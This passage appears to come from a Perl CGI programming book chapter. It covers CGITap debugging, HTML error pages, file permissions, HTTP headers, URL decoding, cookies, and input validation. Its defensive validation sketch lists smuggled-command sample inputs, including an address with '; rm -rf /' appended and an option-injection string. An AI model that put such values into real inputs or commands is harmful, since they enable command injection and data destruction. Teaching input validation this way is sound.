After that statement is executed, the output of all print statements that use the STDERR file handle will be displayed in the web browser window.
You need to be a little careful when using this ability. Your normal error messages will not have the HTML tags required to make them display properly.
CGITap may be installed in any CGI enabled directory and requires perl4.036 or later. You can install CGITap by following these steps:
CGITap has two methods of debugging. The first is adequate for simple CGI applications which do not use HTML forms for input. The second method is used for CGI programs which process HTML form information.
For simple CGIs, add cgitap to the URL. For example, normally a CGI program that just prints the date is called like this:
http://localhost/cgi-bin/date
That CGI program might display the following in the browser's window:
Sun Aug 18 16:07:37 EST 1996
In order to use CGITap for debugging, use a similar URL but with cgitap inserted.
http://localhost/cgi-bin/cgitap/date
CGITap will extract your CGI program's name, display the CGI environment to the browser, perform some checks on the program, then execute the program and return the actual results (both as HTML source and as the actual document).
CGI programs that process HTML forms will be discussed in Chapter 20, "Form Processing," but while I'm talking about CGITap, let me also mention how to use it with HTML forms. A slightly more complicated method must be used for debugging complex CGI scripts that require form processing.
The URL of a form's action is hard-coded (via the ACTION modifier of the <FORM> tag) and you may not wish to change it to include cgitap. To allow CGITap to execute automatically when the form posts to its normal action URL, you can make use of UNIX symbolic links. If you are using Windows NT or Windows 95, you must change the URL in the HTML form. The steps for UNIX platforms are:
For example, let's assume you have a CGI script called mailit that processes form input data, mails the information to you and returns an HTML page to the web browser. To debug this script, move mailit to mailit.tap using the following command:
mv mailit mailit.tap
Then create a link to cgitap using this command:
ln -s cgitap mailit
Now you can fill in the HTML form and submit it as usual.
This method allows UNIX-based scripts and forms to be debugged without having to change hard-coded URLs in your HTML documents. When the form is posted, the results will be the CGITap debugging information, followed by the normal output of mailit.
Pseudocode |
Try (and fail) to open a file. Call the error() function. Define the error() function. Declare a local variable to hold the error message string. Output an HTML page to display the error message. |
Listing 19.7-19LST07.PL - Generating an Error Response Using HTML |
|
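In Perl, the pseudocode above could look something like the following. Treat it as a sketch rather than the original listing: the file name is made up so that the open() is sure to fail, and errorPage() is a hypothetical helper added to keep the page-building step separate from the printing.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: build a complete HTML response, header included,
# that displays the error message.
sub errorPage {
    my ($message) = @_;
    return "Content-type: text/html\n\n"
         . "<HTML><HEAD><TITLE>CGI Error</TITLE></HEAD>\n"
         . "<BODY><H1>Error</H1><P>$message</P></BODY></HTML>\n";
}

# Send the error page to the browser. A real program would usually
# call exit() here so that nothing else is printed afterward.
sub error {
    my ($message) = @_;
    print errorPage($message);
}

# This file name is an assumption chosen so that the open() fails.
my $file = "/hypothetical/missing_file.dat";

unless (open(my $handle, '<', $file)) {
    error("Could not open $file: $!");
}
```

If the message can contain text supplied by the visitor, escape the <, >, and & characters before placing it in the page.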
I'm sure you'll agree that error messages you write yourself are more informative than the standard ones.
After those introductory comments, the fun started. CGI programs were shown to be invoked by a URL. The URL could be entered directly into a web browser or stored in a web page as a hypertext link or the destination for HTML form information.
Before CGI programs can be run under UNIX operating systems, their file permissions need to be set correctly. Files have three types of permissions: read, write, and execute. And there are three types of users that access files: user, group, and others. CGI programs must be both readable and executable by others.
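To make the permission rules concrete, here is a small sketch that sets mode 0755 on a file and then decodes the result. It assumes a UNIX-like system; modeString() and othersCanRun() are hypothetical helper names, and a temporary file stands in for your CGI program.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Turn permission bits such as 0755 into a string such as "rwxr-xr-x".
sub modeString {
    my ($mode) = @_;
    my $string = '';
    foreach my $shift (6, 3, 0) {            # user, group, others
        my $bits = ($mode >> $shift) & 7;
        $string .= ($bits & 4) ? 'r' : '-';  # read
        $string .= ($bits & 2) ? 'w' : '-';  # write
        $string .= ($bits & 1) ? 'x' : '-';  # execute
    }
    return $string;
}

# True when "others" may both read and execute the file.
sub othersCanRun {
    my ($mode) = @_;
    return (($mode & 05) == 05) ? 1 : 0;
}

# A temporary file stands in for a real CGI program in this sketch.
my ($handle, $script) = tempfile(UNLINK => 1);
close($handle);

# 0755 gives the user rwx, and gives group and others r-x.
chmod(0755, $script) or die "Cannot chmod $script: $!";

my $mode = (stat($script))[2] & 07777;
printf("%s has permissions %s\n", $script, modeString($mode));
print "Others can run it.\n" if othersCanRun($mode);
```

From the shell, the equivalent step is the familiar chmod 755 command applied to your script.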
The first line of output of any CGI program must be some type of HTTP header. The most common header is Content-type: which basically tells the web browser what to expect (plain text, perhaps? Or maybe some HTML). The Location: header redirects the web browser to another URL. The Set-cookie: header stores a small bit of information on the visitor's local disk. The last header is Status:, which tells the web browser that an error has arisen.
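As a quick reminder of what those headers look like on the wire, here is a minimal sketch. The httpHeaders() helper is hypothetical, and the URL and cookie values in the comments are placeholders.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: join one or more header lines and finish with the
# blank line that separates the headers from the document body.
sub httpHeaders {
    my (@lines) = @_;
    return join("\n", @lines) . "\n\n";
}

# An ordinary HTML response.
print httpHeaders("Content-type: text/html");
print "<HTML><BODY>Hello, web!</BODY></HTML>\n";

# Other responses a program might send instead (one per request):
#   print httpHeaders("Location: http://localhost/moved.html");
#   print httpHeaders("Status: 404 Not Found", "Content-type: text/html");
#   print httpHeaders("Set-cookie: visits=1", "Content-type: text/html");
```

The blank line is easy to forget; if it is missing, the server cannot tell where the headers end and will typically report an error.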
By placing a / or ? at the end of a URL, information can be passed to the CGI program. Information after a / is placed into the PATH_INFO environment variable. Information after a ? is placed into the QUERY_STRING environment variable.
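Here is a short sketch of how a program might pick up both kinds of information. The sample values are assumptions that stand in for what a server would set when the program is requested with extra path and query information; parseQuery() is a hypothetical helper, and the values it returns are still URL-encoded.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Split a query string such as "name=Rolf&zip=12345" into a hash.
# The values are left URL-encoded.
sub parseQuery {
    my ($query) = @_;
    my %fields;
    foreach my $pair (split(/&/, $query)) {
        next if $pair eq '';
        my ($name, $value) = split(/=/, $pair, 2);
        $fields{$name} = defined($value) ? $value : '';
    }
    return %fields;
}

# Fall back to sample values so the sketch also runs from the command line.
my $pathInfo = defined($ENV{'PATH_INFO'})    ? $ENV{'PATH_INFO'}    : '/extra/path';
my $query    = defined($ENV{'QUERY_STRING'}) ? $ENV{'QUERY_STRING'} : 'name=Rolf&zip=12345';

my %fields = parseQuery($query);

print "Content-type: text/plain\n\n";
print "Extra path information: $pathInfo\n";
foreach my $name (sort keys %fields) {
    print "$name = $fields{$name}\n";
}
```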
Environment variables play a big role in CGI programs. They are the principal means that web servers use to provide information. For example, you can find out the client's IP address using the REMOTE_ADDR variable. And the SCRIPT_NAME variable contains the name of the current program.
URL encoding is used to prevent characters from being misinterpreted. For example, the < character is usually encoded as %3C. In addition, most spaces are converted into plus signs. Listing 19.1 contains a function called decodeURL() that will decode the URL encoding.
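For reference, a decoding function can be quite short. The version below is a sketch of the general technique and is not necessarily identical to the decodeURL() function in Listing 19.1; it is named decodeURLSketch() to keep the two apart.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Reverse URL encoding: plus signs become spaces, and each %XX sequence
# becomes the character with that hexadecimal code.
sub decodeURLSketch {
    my ($text) = @_;
    $text =~ tr/+/ /;                              # do this first, so an encoded %2B stays a plus sign
    $text =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $text;
}

print decodeURLSketch("a%3Cb+is+true"), "\n";
```

The order of the two steps matters. If the %XX sequences were decoded first, a literal plus sign sent as %2B would be turned into a space by the second step.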
One of the biggest security risks happens when a user's data (form input or extra path information) is exposed to operating system commands like mail or grep. Never trust user input! Always suspect the worst. Most hackers spend many hours looking at manuals and source code to find software weaknesses. You need to read about web security in order to protect your site.
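One common defense is to accept only input that matches a strict pattern before it gets anywhere near an operating system command. The sketch below checks a would-be e-mail address; isSafeAddress() is a hypothetical helper, and the pattern is deliberately narrow rather than a complete address validator.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Accept only letters, digits, dots, underscores, and hyphens around a
# single @ sign. Both parts must start with a letter or digit, so the
# value can never look like a command-line option.
sub isSafeAddress {
    my ($address) = @_;
    return ($address =~ /\A[A-Za-z0-9][A-Za-z0-9._-]*\@[A-Za-z0-9][A-Za-z0-9.-]*\z/) ? 1 : 0;
}

# Sample inputs, including one that tries to smuggle in a shell command.
my @samples = (
    'rolf@example.com',
    'rolf@example.com; rm -rf /',
    '-oQ/tmp@example.com',
);

foreach my $sample (@samples) {
    printf("%-30s %s\n", $sample, isSafeAddress($sample) ? "accepted" : "rejected");
}
```

Rejecting everything that is not known to be safe is more reliable than trying to list every dangerous character. Perl's taint mode (the -T switch) is also worth a look for CGI programs.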
The CGIwrap program offers a way to limit the damage potential by running CGI programs with a user id that is different from the web server's. The programs run under the user id of the person who owns them, so any damage is limited to that user's home directory.
Cookies are used to store information on the user's hard drive. They are a way to create persistent information that lasts from one visit to the next.
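As a reminder of the mechanics, the sketch below counts visits with a cookie. The cookie name visits and the 30-day lifetime are assumptions made for the example; the browser's cookies reach the program through the HTTP_COOKIE environment variable.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use POSIX qw(strftime);

# Split a cookie string such as "visits=3; name=Rolf" into a hash.
sub parseCookies {
    my ($header) = @_;
    my %cookies;
    foreach my $pair (split(/;\s*/, $header)) {
        my ($name, $value) = split(/=/, $pair, 2);
        next unless defined($name) && $name ne '';
        $cookies{$name} = defined($value) ? $value : '';
    }
    return %cookies;
}

my %cookies = parseCookies(defined($ENV{'HTTP_COOKIE'}) ? $ENV{'HTTP_COOKIE'} : '');

# Trust the stored count only if it is a plain number.
my $visits = 0;
if (defined($cookies{'visits'}) && $cookies{'visits'} =~ /^(\d+)$/) {
    $visits = $1;
}
$visits++;

# Keep the cookie for 30 days (an arbitrary choice for this sketch).
my $expires = strftime("%a, %d-%b-%Y %H:%M:%S GMT", gmtime(time + 30 * 24 * 60 * 60));

print "Set-cookie: visits=$visits; expires=$expires\n";
print "Content-type: text/plain\n\n";
print "You have visited this page $visits time(s).\n";
```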
You can debug CGI programs by sending messages to the server's log file using the STDERR file handle. Or you could redirect STDERR to STDOUT so that the messages appear in the client web browser's window. If you have a complex problem, consider using CGITap, a program that lets you see all of the environment variables available to your program.
The next chapter, "Form Processing," will introduce you to HTML Forms and how CGI programs can process form information. After the introduction, a Guest book application will be presented. Guest books let visitors leave comments that can be viewed later by other visitors.